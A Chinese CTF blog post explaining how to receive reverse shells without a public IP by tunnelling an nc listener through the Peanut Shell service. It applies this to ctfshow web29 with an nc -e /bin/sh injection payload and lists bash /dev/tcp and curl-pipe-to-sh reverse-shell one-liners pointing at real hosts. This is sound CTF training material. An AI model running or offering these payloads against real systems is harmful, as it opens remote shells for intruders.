目录

  1. 1. 前言
  2. 2. 下载花生壳
  3. 3. 配置
  4. 4. nc
  5. 5. 起http服务
  6. 6. 实战
  7. 7. 多种反弹shell的方式
    1. 7.1. bash弹shell
    2. 7.2. curl弹shell

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

无公网ip反弹shell

2023/6/30 Web
  |     |   总文章阅读量:

前言

因为最近遇到的不少题目都需要我们反弹shell到自己的vps上,但是vps它到后面要花不少钱啊(

于是找了找有没有什么白嫖的方法(x

参考ctfshow的这个视频无公网ip反弹shell

2024.4.7:公网弹shell的极省钱方案(赞美探姬)https://github.com/ProbiusOfficial/Hello_CTF-Shell

下载花生壳

官网

下载安装

注册账号登录即可

然后激活内网穿透的功能

image-20230630161615638


配置

点击映射数进入浏览器

image-20230630161836198

选择添加映射

image-20230630162129982

映射类型选择TCP

模板选择SSH

外网域名会给我们自动生成

内网主机如果是本机的话就是127.0.0.1,端口为你要开启监听的端口,虚拟机的话输入ifconfig查看自己的ip地址

这样就可以了

image-20230630162932880


nc

nc开启监听

image-20230630164039261


起http服务

python3 -m http.server 80
php -S 0.0.0.0:8080
ruby -run -e httpd . -p 9000
busybox httpd -f -p 3333

运行在哪个目录,网站的根目录就在哪

然后花生壳那边配置的内网端口要设置为这里对应的端口号

映射类型要花6块钱买个HTCP(悲报:此方法因为访问会先跳转到欢迎页,已不适用ctf)


实战

以ctfshow web29为例

?c=system("nc 76135132qk.imdo.co 50132 -e /bin/sh");

image-20230630163108532

执行命令,成功连上虚拟机反弹shell

image-20230630164102709

命令执行获取flag

image-20230630164142859


多种反弹shell的方式

更多弹shell参考:https://www.ddosi.org/shell/

bash弹shell

bash -c 'bash -i >& /dev/tcp/115.236.153.172/13314 <&1'

curl弹shell

利用网站:https://reverse-shell.sh/

curl https://reverse-shell.sh/115.236.153.172:13314 | sh